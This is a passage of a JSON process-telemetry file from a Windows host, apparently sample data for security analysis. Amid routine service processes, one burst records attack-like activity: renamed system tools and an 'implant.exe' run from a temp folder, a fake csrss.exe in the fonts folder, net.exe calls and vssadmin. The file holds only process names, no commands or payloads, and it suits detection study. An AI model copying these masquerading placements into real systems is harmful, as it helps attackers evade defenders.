agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0xc08|2019-01-15 04:40:24.013000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0xb8|2019-01-15 04:42:24.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0xfbc|2019-01-15 04:44:24.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0xc08|2019-01-15 04:46:24.017000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x1094|2019-01-15 04:48:24.013000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x138c|2019-01-15 04:50:24.000000\",\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x440|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x440|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\net.exe|0x2a8|2019-01-15 05:15:03.390000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\net.exe|0xfc0|2019-01-15 05:15:03.503000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\net.exe|0xc18|2019-01-15 05:15:10.667000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\net.exe|0x1274|2019-01-15 05:15:10.707000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\diagnostics\\\\usertmp\\\\regsvr32.exe|0xd10|2019-01-15 05:15:10.753000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\diagnostics\\\\usertmp\\\\suchost.exe|0x103c|2019-01-15 05:15:11.260000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe|0xbb4|2019-01-15 05:15:11.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe|0x123c|2019-01-15 05:15:11.537000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\diagnostics\\\\usertmp\\\\certutil.exe|0xa08|2019-01-15 05:15:11.767000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\diagnostics\\\\usertmp\\\\implant.exe|0x240|2019-01-15 05:15:11.947000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\diagnostics\\\\usertmp\\\\implant.exe|0x1250|2019-01-15 05:15:12.003000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\diagnostics\\\\usertmp\\\\implant.exe|0x140c|2019-01-15 05:15:12.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe|0x142c|2019-01-15 05:15:12.123000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe|0x14ac|2019-01-15 05:15:12.393000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe|0x14e0|2019-01-15 05:15:12.513000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe|0x1514|2019-01-15 05:15:12.670000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe|0x154c|2019-01-15 05:15:12.847000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe|0x1580|2019-01-15 05:15:12.977000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe|0x15b4|2019-01-15 05:15:13.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe|0x15e8|2019-01-15 05:15:13.220000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe|0x161c|2019-01-15 05:15:13.337000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe|0x1650|2019-01-15 05:15:13.453000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe|0x1684|2019-01-15 05:15:13.567000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe|0x16b8|2019-01-15 05:15:13.683000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe|0x16ec|2019-01-15 05:15:13.793000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe|0x1724|2019-01-15 05:15:14.033000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\diagnostics\\\\usertmp\\\\reg.exe|0x1758|2019-01-15 05:15:14.157000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\fonts\\\\csrss.exe|0x178c|2019-01-15 05:15:14.293000\",\"c:\\\\windows\\\\system32\\\\win32calc.exe|0x17ac|2019-01-15 05:15:14.377000\",\"c:\\\\windows\\\\system32\\\\win32calc.exe|0x17ac|2019-01-15 05:15:14.377000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\diagnostics\\\\usertmp\\\\rundll32.exe|0x1434|2019-01-15 05:15:14.613000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\net.exe|0x1490|2019-01-15 05:15:15.160000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\net.exe|0x14fc|2019-01-15 05:15:15.440000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\net.exe|0x14e8|2019-01-15 05:15:15.483000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\net.exe|0x1520|2019-01-15 05:15:15.520000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\net.exe|0x1660|2019-01-15 05:15:15.950000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\diagnostics\\\\usertmp\\\\rundll32.exe|0x1728|2019-01-15 05:15:16.340000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\diagnostics\\\\usertmp\\\\rundll32.exe|0x176c|2019-01-15 05:15:16.430000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\diagnostics\\\\usertmp\\\\rundll32.exe|0x17cc|2019-01-15 05:15:16.510000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\vssadmin.exe|0x1550|2019-01-15 05:15:17.137000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x158c|2019-01-15 05:15:17.220000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\diagnostics\\\\usertmp\\\\wuauclt.exe|0x16c0|2019-01-15 05:15:18.080000\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe|0x1704|2019-01-15 05:15:18.147000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\diagnostics\\\\usertmp\\\\lsass.exe|0x16f4|2019-01-15 05:15:18.287000\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe|0x1770|2019-01-15 05:15:18.300000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x440|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x440|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x440|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x440|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x440|1970-01-01 00:00:00.000000\",\"NaN\",\"c:\\\\windows\\\\system32\\\\services.exe|0x230|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe|0x230|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe|0x230|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe|0x230|1970-01-01 00:00:00.000000\",\"NaN\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0xa40|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x690|2019-01-15 04:43:05.240000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x690|2019-01-15 04:43:05.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1388|2019-01-15 04:44:37.180000\",\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x77c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\dism.exe|0x132c|2019-01-15 05:15:03.543000\",\"c:\\\\windows\\\\system32\\\\dism.exe|0x132c|2019-01-15 05:15:03.543000\"],\"parent_proc_lc\":[\"NaN\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring 